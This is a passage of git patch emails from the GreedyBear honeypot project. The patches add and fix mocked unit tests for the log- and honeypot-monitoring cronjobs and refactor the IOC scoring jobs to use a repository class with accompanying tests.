+++ b/tests/test_repositories.py
@@ -376,7 +376,7 @@ def test_healthcheck_passes_when_ping_succeeds(self):
def test_healthcheck_raises_when_ping_fails(self):
self.mock_client.ping.return_value = False
- with self.assertRaises(ElasticRepository.ElasticServerDownException) as ctx:
+ with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
self.repo._healthcheck()
self.assertIn("not reachable", str(ctx.exception))
From 5e5678d9d000d5507aeb51e3d859a967f291e7e4 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Sat, 10 Jan 2026 22:14:33 +0530
Subject: [PATCH 37/75] Tests(Cronjobs): Adding tests for MonitorLogs and
MonitorHoneyPots. (#669)
* Adding tests for MonitorLogs and MonitorHoneyPots.
* running linters
* Rewriting tests so they can be decoupled.
* Add tests for monitor logs and monitor honeypots
* removing unused import
---
.../cronjobs/test_monitor_honeypots.py | 70 +++++++++++++++++
.../greedybear/cronjobs/test_monitor_logs.py | 78 +++++++++++++++++++
2 files changed, 148 insertions(+)
create mode 100644 tests/greedybear/cronjobs/test_monitor_honeypots.py
create mode 100644 tests/greedybear/cronjobs/test_monitor_logs.py
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
new file mode 100644
index 00000000..b4482eac
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -0,0 +1,70 @@
+from unittest.mock import MagicMock, patch
+
+from django.test import TestCase
+from greedybear.cronjobs.monitor_honeypots import MonitorHoneypots
+from greedybear.models import GeneralHoneypot
+
+
+class MonitorHoneypotsTestCase(TestCase):
+ def setUp(self):
+ """Creating two honeypots in the database for testing."""
+ self.honeypot1 = GeneralHoneypot.objects.create(name="Log4pot", active=True)
+ self.honeypot2 = GeneralHoneypot.objects.create(name="Cowrie", active=True)
+
+ @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+ def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
+ # Setup mock responses
+ mock_elastic_repo = mock_elastic_repo_class.return_value
+
+ mock_elastic_repo.has_honeypot_been_hit.return_value = True
+ cronjob = MonitorHoneypots(minutes_back=60)
+ cronjob.log = MagicMock()
+
+ # Run the cronjob
+ cronjob.execute()
+
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+ info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+ warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+ self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 2)
+ self.assertEqual(len(warning_calls), 0)
+
+ @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+ def test_run_some_active_honeypots_are_hit(self, mock_elastic_repo_class):
+ # Setup mock responses
+ mock_elastic_repo = mock_elastic_repo_class.return_value
+ mock_elastic_repo.has_honeypot_been_hit.side_effect = [True, False]
+ cronjob = MonitorHoneypots(minutes_back=60)
+ cronjob.log = MagicMock()
+
+ # Run the cronjob
+ cronjob.execute()
+
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+ info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+ warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+ self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 1)
+ self.assertEqual(len(warning_calls), 1)
+
+ @patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
+ def test_run_no_active_honeypots_are_hit(self, mock_elastic_repo_class):
+ # Setup mock responses
+ mock_elastic_repo = mock_elastic_repo_class.return_value
+ mock_elastic_repo.has_honeypot_been_hit.return_value = False
+ cronjob = MonitorHoneypots(minutes_back=60)
+ cronjob.log = MagicMock()
+
+ # Run the cronjob
+ cronjob.execute()
+
+ self.assertEqual(mock_elastic_repo.has_honeypot_been_hit.call_count, 2)
+
+ info_calls = [call[0][0] for call in cronjob.log.info.call_args_list]
+ warning_calls = [call[0][0] for call in cronjob.log.warning.call_args_list]
+
+ self.assertEqual(len([msg for msg in info_calls if "logs available" in msg]), 0)
+ self.assertEqual(len(warning_calls), 2)
diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
new file mode 100644
index 00000000..651b8a94
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -0,0 +1,78 @@
+from datetime import datetime, timedelta
+from pathlib import Path
+from unittest import TestCase
+from unittest.mock import MagicMock, patch
+
+from greedybear.cronjobs.monitor_logs import MonitorLogs
+
+
+class MonitorLogsTestCase(TestCase):
+ @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+ @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+ @patch("greedybear.cronjobs.monitor_logs.send_message")
+ def test_run_all_recent_logs(self, mock_send, mock_stat, mock_exists):
+ # Setup mock responses
+ mock_exists.return_value = True
+
+ # Simulate all recent activity
+ recent_time = datetime.now().timestamp()
+ mock_stat.return_value.st_mtime = recent_time
+
+ # Run the cronjob
+ cronjob = MonitorLogs()
+ cronjob.execute()
+
+ self.assertEqual(mock_send.call_count, 4)
+
+ @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+ @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+ @patch("greedybear.cronjobs.monitor_logs.send_message")
+ def test_run_some_recent_logs(self, mock_send, mock_stat, mock_exists):
+ # Setup mock responses
+ mock_exists.return_value = True
+
+ recent_time = datetime.now().timestamp()
+ old_time = (datetime.now() - timedelta(hours=2)).timestamp()
+
+ # Side effect for multiple calls
+ mock_stat.side_effect = [
+ MagicMock(spec=["st_mtime"], st_mtime=recent_time),
+ MagicMock(spec=["st_mtime"], st_mtime=old_time),
+ MagicMock(spec=["st_mtime"], st_mtime=old_time),
+ MagicMock(spec=["st_mtime"], st_mtime=old_time),
+ ]
+
+ # Run the cronjob
+ cronjob = MonitorLogs()
+ cronjob.execute()
+
+ mock_send.assert_called_once_with("found errors in log file greedybear_errors.log")
+
+ @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+ @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+ @patch("greedybear.cronjobs.monitor_logs.send_message")
+ def test_run_no_recent_logs(self, mock_send, mock_stat, mock_exists):
+ # Setup mock responses
+ mock_exists.return_value = True
+
+ # Simulate no recent activity
+ mock_stat.return_value.st_mtime = (datetime.now() - timedelta(hours=3)).timestamp()
+
+ # Run the cronjob
+ cronjob = MonitorLogs()
+ cronjob.execute()
+
+ mock_send.assert_not_called()
+
+ @patch("greedybear.cronjobs.monitor_logs.Path.exists")
+ @patch("greedybear.cronjobs.monitor_logs.Path.stat")
+ @patch("greedybear.cronjobs.monitor_logs.send_message")
+ def test_run_no_file(self, mock_send, mock_stat, mock_exists):
+ # Setup mock responses
+ mock_exists.return_value = False
+
+ # Run the cronjob
+ cronjob = MonitorLogs()
+ cronjob.execute()
+
+ mock_send.assert_not_called()
From 0a49f504ae3560b699fa2e5be6995211e2f04191 Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Sun, 11 Jan 2026 02:12:26 +0530
Subject: [PATCH 38/75] fix-tests (#695)
---
.../greedybear/cronjobs/test_monitor_logs.py | 51 +++++++++++--------
1 file changed, 29 insertions(+), 22 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_monitor_logs.py b/tests/greedybear/cronjobs/test_monitor_logs.py
index 651b8a94..9c3052e6 100644
--- a/tests/greedybear/cronjobs/test_monitor_logs.py
+++ b/tests/greedybear/cronjobs/test_monitor_logs.py
@@ -1,5 +1,4 @@
from datetime import datetime, timedelta
-from pathlib import Path
from unittest import TestCase
from unittest.mock import MagicMock, patch
@@ -7,67 +6,74 @@
class MonitorLogsTestCase(TestCase):
+ @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+ @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
@patch("greedybear.cronjobs.monitor_logs.Path.exists")
@patch("greedybear.cronjobs.monitor_logs.Path.stat")
- @patch("greedybear.cronjobs.monitor_logs.send_message")
- def test_run_all_recent_logs(self, mock_send, mock_stat, mock_exists):
+ def test_run_all_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
# Setup mock responses
mock_exists.return_value = True
# Simulate all recent activity
recent_time = datetime.now().timestamp()
- mock_stat.return_value.st_mtime = recent_time
+ mock_stat.return_value = MagicMock(st_mtime=recent_time)
# Run the cronjob
cronjob = MonitorLogs()
cronjob.execute()
- self.assertEqual(mock_send.call_count, 4)
+ self.assertEqual(mock_slack.call_count, 4)
+ self.assertEqual(mock_ntfy.call_count, 4)
+ @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+ @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
@patch("greedybear.cronjobs.monitor_logs.Path.exists")
@patch("greedybear.cronjobs.monitor_logs.Path.stat")
- @patch("greedybear.cronjobs.monitor_logs.send_message")
- def test_run_some_recent_logs(self, mock_send, mock_stat, mock_exists):
+ def test_run_some_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
# Setup mock responses
mock_exists.return_value = True
+ # Simulate all recent activity
recent_time = datetime.now().timestamp()
old_time = (datetime.now() - timedelta(hours=2)).timestamp()
- # Side effect for multiple calls
mock_stat.side_effect = [
- MagicMock(spec=["st_mtime"], st_mtime=recent_time),
- MagicMock(spec=["st_mtime"], st_mtime=old_time),
- MagicMock(spec=["st_mtime"], st_mtime=old_time),
- MagicMock(spec=["st_mtime"], st_mtime=old_time),
+ MagicMock(st_mtime=recent_time), # greedybear
+ MagicMock(st_mtime=old_time), # api
+ MagicMock(st_mtime=old_time), # django
+ MagicMock(st_mtime=old_time), # celery
]
# Run the cronjob
cronjob = MonitorLogs()
cronjob.execute()
- mock_send.assert_called_once_with("found errors in log file greedybear_errors.log")
+ mock_slack.assert_called_once_with("found errors in log file greedybear_errors.log")
+ self.assertEqual(mock_ntfy.call_count, 1)
+ @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+ @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
@patch("greedybear.cronjobs.monitor_logs.Path.exists")
@patch("greedybear.cronjobs.monitor_logs.Path.stat")
- @patch("greedybear.cronjobs.monitor_logs.send_message")
- def test_run_no_recent_logs(self, mock_send, mock_stat, mock_exists):
+ def test_run_no_recent_logs(self, mock_stat, mock_exists, mock_slack, mock_ntfy):
# Setup mock responses
mock_exists.return_value = True
- # Simulate no recent activity
- mock_stat.return_value.st_mtime = (datetime.now() - timedelta(hours=3)).timestamp()
+ # Simulate all recent activity
+ old_time = (datetime.now() - timedelta(hours=3)).timestamp()
+ mock_stat.return_value = MagicMock(st_mtime=old_time)
# Run the cronjob
cronjob = MonitorLogs()
cronjob.execute()
- mock_send.assert_not_called()
+ mock_slack.assert_not_called()
+ mock_ntfy.assert_not_called()
+ @patch("greedybear.cronjobs.monitor_logs.send_ntfy_message")
+ @patch("greedybear.cronjobs.monitor_logs.send_slack_message")
@patch("greedybear.cronjobs.monitor_logs.Path.exists")
- @patch("greedybear.cronjobs.monitor_logs.Path.stat")
- @patch("greedybear.cronjobs.monitor_logs.send_message")
- def test_run_no_file(self, mock_send, mock_stat, mock_exists):
+ def test_run_no_file(self, mock_exists, mock_slack, mock_ntfy):
# Setup mock responses
mock_exists.return_value = False
@@ -75,4 +81,5 @@ def test_run_no_file(self, mock_send, mock_stat, mock_exists):
cronjob = MonitorLogs()
cronjob.execute()
- mock_send.assert_not_called()
+ mock_slack.assert_not_called()
+ mock_ntfy.assert_not_called()
From 1f64f764993d96926bafaee023a860e48117c288 Mon Sep 17 00:00:00 2001
From: tim
Date: Sat, 10 Jan 2026 22:03:01 +0100
Subject: [PATCH 39/75] Remove unused GeneralHoneypot creation from
MonitorLogsTestCase
---
tests/greedybear/cronjobs/test_monitor_honeypots.py | 9 ++-------
1 file changed, 2 insertions(+), 7 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index b4482eac..cd9a3c9e 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -1,15 +1,10 @@
from unittest.mock import MagicMock, patch
-from django.test import TestCase
from greedybear.cronjobs.monitor_honeypots import MonitorHoneypots
-from greedybear.models import GeneralHoneypot
+from tests import CustomTestCase
-class MonitorHoneypotsTestCase(TestCase):
- def setUp(self):
- """Creating two honeypots in the database for testing."""
- self.honeypot1 = GeneralHoneypot.objects.create(name="Log4pot", active=True)
- self.honeypot2 = GeneralHoneypot.objects.create(name="Cowrie", active=True)
+class MonitorHoneypotsTestCase(CustomTestCase):
@patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
From 550bb56a4549570d708ce0ff401de2a9a740c938 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Mon, 12 Jan 2026 00:57:21 +0530
Subject: [PATCH 40/75] Refactor scoring jobs to use IocRepository. Addresses
#633 (#696)
* Refactor scoring jobs to use IocRepository
- Add scoring-specific methods to IocRepository:
- get_scanners_for_scoring(): Fetch scanners for scoring updates
- get_scanners_by_pks(): Retrieve scanners by primary keys
- get_recent_scanners(): Get scanners seen after cutoff date
- bulk_update_scores(): Bulk update score fields
- Refactor UpdateScores to use dependency injection with IocRepository
- Add optional ioc_repo parameter (backward compatible)
- Replace IOC.objects.filter() with repository methods
- Replace IOC.objects.bulk_update() with repository.bulk_update_scores()
- Update utility functions to accept IocRepository parameter:
- get_current_data(days_lookback, ioc_repo)
- get_data_by_pks(primary_keys, ioc_repo)
- Remove unused Django ORM imports (Q, F, ArrayAgg, IOC model)
- Add comprehensive test coverage (47 tests total):
- 11 basic repository method tests
- 10 edge case tests (empty results, inactive honeypots, etc.)
- 6 integration tests proving end-to-end functionality
- All tests passing with full Ruff compliance
This change improves testability and consistency with the extraction
pipeline. Addresses Phase 1 of issue #633.
* style: format test_monitor_honeypots.py with ruff
* fix: update GeneralHoneypotViewTestCase for dynamic test data
* refactor: improve code style per maintainer feedback
- Move all Django imports (ArrayAgg, F, Q) to module top
- Use ternary operators for cleaner None checks
- Fix test_200_active_general_honeypots to properly verify filtering logic
Changes:
- ioc.py: Moved imports to top, removed duplicates from methods
- scoring_jobs.py: Simplified __init__ and update_db with ternary operators
- utils.py: Moved IocRepository import to top, simplified both functions
- test_views.py: Restored proper active/inactive honeypot filtering assertions
Addresses code review comments from @regulartim
* refactor: move IocRepository import to module top
- Move IocRepository import from UpdateScores.__init__ to module level
- Consistent with maintainer's feedback on keeping all imports at top
- No circular dependency issue, safe to move
---
greedybear/cronjobs/repositories/ioc.py | 79 +++++
greedybear/cronjobs/scoring/scoring_jobs.py | 17 +-
greedybear/cronjobs/scoring/utils.py | 33 +-
.../cronjobs/test_monitor_honeypots.py | 1 -
tests/test_repositories.py | 321 ++++++++++++++++++
tests/test_views.py | 15 +-
6 files changed, 426 insertions(+), 40 deletions(-)
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index f9ef046b..7b0016d8 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,5 +1,8 @@
import logging
+from django.contrib.postgres.aggregates import ArrayAgg
+from django.db.models import F, Q
+
from greedybear.models import IOC, GeneralHoneypot
@@ -146,3 +149,79 @@ def save(self, ioc: IOC) -> IOC:
"""
ioc.save()
return ioc
+
+ def get_scanners_for_scoring(self, score_fields: list[str]) -> list[IOC]:
+ """
+ Get all scanners associated with active honeypots for scoring.
+
+ Retrieves IOCs that are marked as scanners and are associated with either
+ Cowrie, Log4j, or active general honeypots. Returns only the name field
+ and specified score fields for efficiency.
+
+ Args:
+ score_fields: List of score field names to retrieve (e.g., ['recurrence_probability']).
+
+ Returns:
+ QuerySet of IOC objects with only name and score fields loaded.
+ """
+ return IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_fields)
+
+ def get_scanners_by_pks(self, primary_keys: set[int]):
+ """
+ Retrieve scanners by their primary keys with related honeypot data.
+
+ Args:
+ primary_keys: Set of IOC primary keys to retrieve.
+
+ Returns:
+ QuerySet of IOC objects with prefetched general_honeypot relationships
+ and annotated with value and honeypots fields.
+ """
+ return (
+ IOC.objects.filter(pk__in=primary_keys)
+ .prefetch_related("general_honeypot")
+ .annotate(value=F("name"))
+ .annotate(honeypots=ArrayAgg("general_honeypot__name"))
+ .values()
+ )
+
+ def get_recent_scanners(self, cutoff_date, days_lookback: int = 30):
+ """
+ Get scanners seen after a specific cutoff date.
+
+ Retrieves IOCs that are marked as scanners, associated with active honeypots,
+ and have been seen after the specified cutoff date.
+
+ Args:
+ cutoff_date: DateTime threshold - only IOCs seen after this will be returned.
+ days_lookback: Number of days to look back (used for logging, not query).
+
+ Returns:
+ QuerySet of IOC objects with prefetched relationships and annotations.
+ """
+ return (
+ IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+ .filter(last_seen__gte=cutoff_date, scanner=True)
+ .prefetch_related("general_honeypot")
+ .annotate(value=F("name"))
+ .annotate(honeypots=ArrayAgg("general_honeypot__name"))
+ .values()
+ )
+
+ def bulk_update_scores(self, iocs: list[IOC], score_fields: list[str], batch_size: int = 1000) -> int:
+ """
+ Bulk update IOC score fields in the database.
+
+ Args:
+ iocs: List of IOC objects with updated score values.
+ score_fields: List of field names to update (e.g., ['recurrence_probability']).
+ batch_size: Number of objects to update per database query.
+
+ Returns:
+ Number of objects updated (Note: Django's bulk_update returns None,
+ so we return the count of iocs provided).
+ """
+ if not iocs:
+ return 0
+ IOC.objects.bulk_update(iocs, score_fields, batch_size=batch_size)
+ return len(iocs)
diff --git a/greedybear/cronjobs/scoring/scoring_jobs.py b/greedybear/cronjobs/scoring/scoring_jobs.py
index 015a40b7..95e1830d 100644
--- a/greedybear/cronjobs/scoring/scoring_jobs.py
+++ b/greedybear/cronjobs/scoring/scoring_jobs.py
@@ -5,9 +5,9 @@
import pandas as pd
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage
-from django.db.models import Q
from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.repositories import IocRepository
from greedybear.cronjobs.scoring.random_forest import RFClassifier, RFRegressor
from greedybear.cronjobs.scoring.utils import (
correlated_features,
@@ -149,9 +149,10 @@ class UpdateScores(Cronjob):
Designed to run as a scheduled cronjob.
"""
- def __init__(self):
+ def __init__(self, ioc_repo=None):
super().__init__()
self.data = None
+ self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
"""
@@ -173,15 +174,11 @@ def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
int: The number of objects updated in the database.
"""
self.log.info("begin updating scores")
- reset_old_scores = False
+ reset_old_scores = iocs is None
score_names = [s.score_name for s in SCORERS]
scores_by_ip = df.set_index("value")[score_names].to_dict("index")
- # If no IoCs were passed as an argument, fetch all IoCs
- if iocs is None:
- iocs = (
- IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True)).filter(scanner=True).distinct().only("name", *score_names)
- )
- reset_old_scores = True
+ # If no IoCs were passed as an argument, fetch all IoCs via repository
+ iocs = self.ioc_repo.get_scanners_for_scoring(score_names) if iocs is None else iocs
iocs_to_update = []
self.log.info(f"checking {len(iocs)} IoCs")
@@ -203,7 +200,7 @@ def update_db(self, df: pd.DataFrame, iocs: set[IOC] = None) -> int:
if updated:
iocs_to_update.append(ioc)
self.log.info(f"writing updated scores for {len(iocs_to_update)} IoCs to DB")
- result = IOC.objects.bulk_update(iocs_to_update, score_names, batch_size=1000) if iocs_to_update else 0
+ result = self.ioc_repo.bulk_update_scores(iocs_to_update, score_names)
self.log.info(f"{result} IoCs were updated")
return result
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 878554e2..6e097203 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -3,11 +3,9 @@
import numpy as np
import pandas as pd
-from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F, Q
from api.views.utils import FeedRequestParams, feeds_response
-from greedybear.models import IOC
+from greedybear.cronjobs.repositories import IocRepository
@cache
@@ -147,28 +145,24 @@ def serialize_iocs(iocs: list[dict]) -> list[dict]:
)["iocs"]
-def get_data_by_pks(primary_keys: set) -> list[dict]:
+def get_data_by_pks(primary_keys: set, ioc_repo=None) -> list[dict]:
"""
Retrieve and serialize IOC data for a collection of primary keys.
Args:
primary_keys: A set of IOC primary keys to retrieve from the database.
+ ioc_repo: Optional IocRepository instance. If None, creates a new one.
Returns:
list: Serialized IOC data including associated honeypot names.
Processed through feeds_response API method.
"""
- iocs = (
- IOC.objects.filter(pk__in=primary_keys)
- .prefetch_related("general_honeypot")
- .annotate(value=F("name"))
- .annotate(honeypots=ArrayAgg("general_honeypot__name"))
- .values()
- )
+ ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+ iocs = ioc_repo.get_scanners_by_pks(primary_keys)
return serialize_iocs(iocs)
-def get_current_data(days_lookback: int = 30) -> list[dict]:
+def get_current_data(days_lookback: int = 30, ioc_repo=None) -> list[dict]:
"""
Get current IOC data for scanners seen in the last N days.
@@ -180,22 +174,13 @@ def get_current_data(days_lookback: int = 30) -> list[dict]:
Args:
days_lookback: Number of days to look back for last_seen timestamp.
Defaults to 30 days.
+ ioc_repo: Optional IocRepository instance. If None, creates a new one.
Returns:
list: Serialized IOC data including associated honeypot names.
Processed through feeds_response API method.
"""
+ ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
cutoff_date = datetime.now() - timedelta(days=days_lookback)
- query_dict = {
- "last_seen__gte": cutoff_date,
- "scanner": True,
- }
- iocs = (
- IOC.objects.filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
- .filter(**query_dict)
- .prefetch_related("general_honeypot")
- .annotate(value=F("name"))
- .annotate(honeypots=ArrayAgg("general_honeypot__name"))
- .values()
- )
+ iocs = ioc_repo.get_recent_scanners(cutoff_date, days_lookback)
return serialize_iocs(iocs)
diff --git a/tests/greedybear/cronjobs/test_monitor_honeypots.py b/tests/greedybear/cronjobs/test_monitor_honeypots.py
index cd9a3c9e..5b6bf160 100644
--- a/tests/greedybear/cronjobs/test_monitor_honeypots.py
+++ b/tests/greedybear/cronjobs/test_monitor_honeypots.py
@@ -5,7 +5,6 @@
class MonitorHoneypotsTestCase(CustomTestCase):
-
@patch("greedybear.cronjobs.monitor_honeypots.ElasticRepository")
def test_run_all_active_honeypots_are_hit(self, mock_elastic_repo_class):
# Setup mock responses
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 7544f232..613a7cf3 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -174,6 +174,327 @@ def test_special_and_normal_honeypots(self):
self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+ def test_get_scanners_for_scoring_returns_scanners(self):
+ # Create scanners
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
+ IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+
+ result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
+
+ names = [ioc.name for ioc in result]
+ self.assertIn("1.2.3.4", names)
+ self.assertIn("5.6.7.8", names)
+
+ def test_get_scanners_for_scoring_excludes_non_scanners(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+
+ result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
+
+ names = [ioc.name for ioc in result]
+ self.assertNotIn("1.2.3.4", names)
+
+ def test_get_scanners_for_scoring_only_loads_specified_fields(self):
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ # Check that our created IOC is in the results
+ names = [ioc.name for ioc in result]
+ self.assertIn("1.2.3.4", names)
+ # Verify name field is accessible (field was loaded)
+ test_ioc = next(ioc for ioc in result if ioc.name == "1.2.3.4")
+ self.assertEqual(test_ioc.name, "1.2.3.4")
+
+ def test_get_scanners_by_pks_returns_correct_iocs(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
+ IOC.objects.create(name="9.10.11.12", type="ip") # Should not be returned
+
+ result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
+
+ self.assertEqual(len(result), 2)
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+ self.assertIn("5.6.7.8", values)
+ self.assertNotIn("9.10.11.12", values)
+
+ def test_get_scanners_by_pks_includes_honeypot_annotation(self):
+ hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ ioc.general_honeypot.add(hp)
+
+ result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+ self.assertEqual(len(result), 1)
+ self.assertIn("honeypots", result[0])
+
+ def test_get_recent_scanners_returns_recent_only(self):
+ from datetime import datetime, timedelta
+
+ recent_date = datetime.now() - timedelta(days=5)
+ old_date = datetime.now() - timedelta(days=40)
+
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+ IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
+
+ values = [r["value"] for r in result]
+ self.assertIn("1.2.3.4", values)
+ self.assertNotIn("5.6.7.8", values)
+
+ def test_get_recent_scanners_excludes_non_scanners(self):
+ from datetime import datetime, timedelta
+
+ recent_date = datetime.now() - timedelta(days=5)
+ IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ result = list(self.repo.get_recent_scanners(cutoff))
+
+ values = [r["value"] for r in result]
+ self.assertNotIn("1.2.3.4", values)
+
+ def test_bulk_update_scores_updates_multiple_iocs(self):
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
+
+ ioc1.recurrence_probability = 0.75
+ ioc2.recurrence_probability = 0.85
+
+ result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
+
+ self.assertEqual(result, 2)
+ updated1 = IOC.objects.get(name="1.2.3.4")
+ updated2 = IOC.objects.get(name="5.6.7.8")
+ self.assertEqual(updated1.recurrence_probability, 0.75)
+ self.assertEqual(updated2.recurrence_probability, 0.85)
+
+ def test_bulk_update_scores_returns_zero_for_empty_list(self):
+ result = self.repo.bulk_update_scores([], ["recurrence_probability"])
+ self.assertEqual(result, 0)
+
+ def test_bulk_update_scores_updates_multiple_fields(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
+
+ ioc.recurrence_probability = 0.75
+ ioc.expected_interactions = 10.5
+
+ result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
+
+ self.assertEqual(result, 1)
+ updated = IOC.objects.get(name="1.2.3.4")
+ self.assertEqual(updated.recurrence_probability, 0.75)
+ self.assertEqual(updated.expected_interactions, 10.5)
+
+ # Edge case tests
+ def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
+ # Delete all existing scanners
+ IOC.objects.filter(scanner=True).delete()
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
+ hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+ ioc.general_honeypot.add(hp)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ names = [ioc.name for ioc in result]
+ self.assertNotIn("1.2.3.4", names)
+
+ def test_get_scanners_for_scoring_with_multiple_honeypots(self):
+ hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+ hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+ ioc.general_honeypot.add(hp1, hp2)
+
+ result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
+
+ names = [ioc.name for ioc in result]
+ # Should appear only once despite multiple honeypots (distinct)
+ self.assertEqual(names.count("1.2.3.4"), 1)
+
+ def test_get_scanners_by_pks_with_empty_set(self):
+ result = list(self.repo.get_scanners_by_pks(set()))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_by_pks_with_nonexistent_pks(self):
+ result = list(self.repo.get_scanners_by_pks({99999, 99998}))
+
+ self.assertEqual(len(result), 0)
+
+ def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ result = list(self.repo.get_scanners_by_pks({ioc.pk}))
+
+ self.assertEqual(len(result), 1)
+ self.assertIn("honeypots", result[0])
+
